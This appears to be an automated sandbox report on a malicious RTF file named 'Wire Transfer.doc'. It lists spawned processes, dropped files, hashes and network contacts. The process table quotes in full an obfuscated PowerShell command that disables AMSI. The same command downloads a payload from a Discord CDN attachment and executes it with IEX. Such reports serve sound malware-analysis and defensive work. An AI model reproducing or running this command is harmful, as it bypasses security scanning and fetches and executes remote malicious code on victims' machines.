File name: | Wire Transfer.doc |
Full analysis: | https://app.any.run/tasks/939c83d4-1757-45a2-9eb3-125f750e7327 |
Verdict: | Malicious activity |
Analysis date: | January 24, 2022, 22:41:59 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/rtf |
File info: | Rich Text Format data, version 1, unknown character set |
MD5: | 673A38847B61702DFFFE16F3EF663E6E |
SHA1: | E5ACCBCE7AC7CDD8739270E9B392AC587B0DD1C7 |
SHA256: | 2D11902F0163D96CE589DB1484C7A50AC7FB31195881B45D7135E64F6D5B8FBC |
SSDEEP: | 1536:u264J3fbgjEHezPzjbzOz2zgz1zjbzezmbz+zazKzgzuzmz/zxzEzzzezmbz+zab:08JQp8JHG |
.rtf | | | Rich Text Format (100) |
---|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3004 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Wire Transfer.doc.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | Explorer.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2736 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
2496 | CmD.exe /C cscript %tmp%\Client.vbs AC | C:\Windows\system32\CmD.exe | — | EQNEDT32.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2640 | cscript C:\Users\admin\AppData\Local\Temp\Client.vbs AC | C:\Windows\system32\cscript.exe | — | CmD.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft � Console Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
1272 | Powershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);$2703183199940741270318319994074127031831999407412703183199940741=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,57,51,50,55,48,51,49,56,51,49,57,57,57,52,48,55,52,49,47,57,51,50,55,48,51,51,53,52,54,50,57,53,50,57,54,49,48,47,104,105,116,101,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($2703183199940741270318319994074127031831999407412703183199940741)|I`E`X | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3004 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRE90B.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3004 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:CE122B43DC34F0399FBCA8E567EE9593 | SHA256:1B48569C8D636659775125BFE94FCD01E7C308AA6F3C3046449693E6EBB2A790 | |||
1272 | Powershell.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 | der | |
MD5:494A7483CEAF488A79CB45418E88ECCD | SHA256:9A65904F97742B3D8844EFAFCE7D9E9DA7C1B96A8FDE541E718768AE68293D50 | |||
1272 | Powershell.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 | binary | |
MD5:5E9D892D37BBC20F7CF44052FCB3AA41 | SHA256:7EFEBF17C89B2289BBF3E8BD9AB35CDAAC896C2A5AD4982CC84A46BBAF0F0520 | |||
3004 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Client.vbs | text | |
MD5:7D62B9B3DF8CDAF06DE881AD1860055D | SHA256:A313613D88053A4F6FAF988750597BA309DE2C2F34CD8709AF2AD059FC65D983 | |||
3004 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Wire Transfer.doc.rtf.LNK | lnk | |
MD5:96CE7D8EEEBBC4A9F73F568E56609F68 | SHA256:41B5135ADC95408A3C2DE71B3EC77E529820956FEBD8A68F8BE6FF4B6229909A | |||
3004 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | ini | |
MD5:2162A46B7EA6C1B7E2B09C82EAAB3B2D | SHA256:41044CEA93FF833689EC75C5324B6308A2FF05A9E281AD22B1D381CC13959620 | |||
1272 | Powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
MD5:D3C284009A5790C3AA90D7C5D620CA65 | SHA256:6C12FFF497059706D50431BB47C624FA24A8A7F9B6D52B2AB251FDC588E00E39 | |||
3004 | WINWORD.EXE | C:\Users\admin\Desktop\~$re Transfer.doc.rtf | pgc | |
MD5:4A6E0F4C8554F831FADC33D70743A855 | SHA256:4F4A1BCF31B2172F1078E3FDA26AF6AC4D0AB301CFC8205B79A804432B38B3E2 | |||
1272 | Powershell.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | binary | |
MD5:EBF8534A419964083D677BE1752E698F | SHA256:0A71C911903867C9B10B15FFC233EC332C4AA857D6E6190C0583B24B23B78D8E |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1272 | Powershell.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAo3h2ReX7SMIk79G%2B0UDDw%3D | US | der | 1.47 Kb | whitelisted |
1272 | Powershell.exe | GET | 200 | 93.184.221.240:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?6d268db0aaec37f7 | US | compressed | 4.70 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1272 | Powershell.exe | 93.184.220.29:80 | ocsp.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
1272 | Powershell.exe | 162.159.135.233:443 | cdn.discordapp.com | Cloudflare Inc | — | shared |
1272 | Powershell.exe | 93.184.221.240:80 | ctldl.windowsupdate.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
1272 | Powershell.exe | 162.159.129.233:443 | cdn.discordapp.com | Cloudflare Inc | — | shared |
Domain | IP | Reputation |
---|---|---|
google.com |
| whitelisted |
cdn.discordapp.com |
| shared |
ctldl.windowsupdate.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |